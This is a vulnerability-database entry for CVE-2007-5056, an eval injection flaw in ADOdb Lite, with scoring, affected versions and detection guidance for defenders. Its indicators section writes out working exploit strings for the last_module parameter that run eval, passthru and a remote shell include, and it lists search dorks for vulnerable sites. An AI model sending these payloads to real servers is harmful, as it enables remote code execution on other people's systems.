cbcvebase.
CVE-2007-5056
published 2007-09-24

CVE-2007-5056: Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF…

PriorityP353medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
27.87%
97.9th percentile
Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
adodb_liteadodb_lite<= 1.42

Detection & IOCsextracted from sources · hover to see the quote

path/lib/adodb_lite/adodb-perf-module.inc.php
path/includes/adodb_lite/adodb-perf-module.inc.php
path/vendors/adodb_lite/adodb-perf-module.inc.php
filenameadodb-perf-module.inc.php
commandlast_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
commandlast_module=t{};%20class%20t{};passthru(ls);//
commandlast_module=t{};%20class%20t{};include(URL-SHELL);//
  • Monitor HTTP requests targeting adodb-perf-module.inc.php with a `last_module` parameter containing PHP class injection patterns (e.g., `{}`, `eval`, `passthru`, `include`) — these are the direct exploit vectors for this eval-injection vulnerability.
  • The vulnerable eval statement is `eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');` — alert on any request where `last_module` contains characters such as `{`, `}`, `;`, or known PHP function names.
  • Exploitation requires `register_globals = On` in php.ini; environments with this setting enabled and the vulnerable file publicly accessible are at highest risk.
  • Search web server logs for the dork string `Powered by PacerCMS` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • Search web server logs for the dork string `Powered by SAPID CMF Build 87` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • Search web server logs for the dork string `powered by CMS Made Simple version 1.1.2` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • ·Exploitation is only possible when PHP's `register_globals` directive is enabled (`On`), which allows the `last_module` GET parameter to be injected directly into the eval call. Systems with `register_globals = Off` are not exploitable via this vector.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.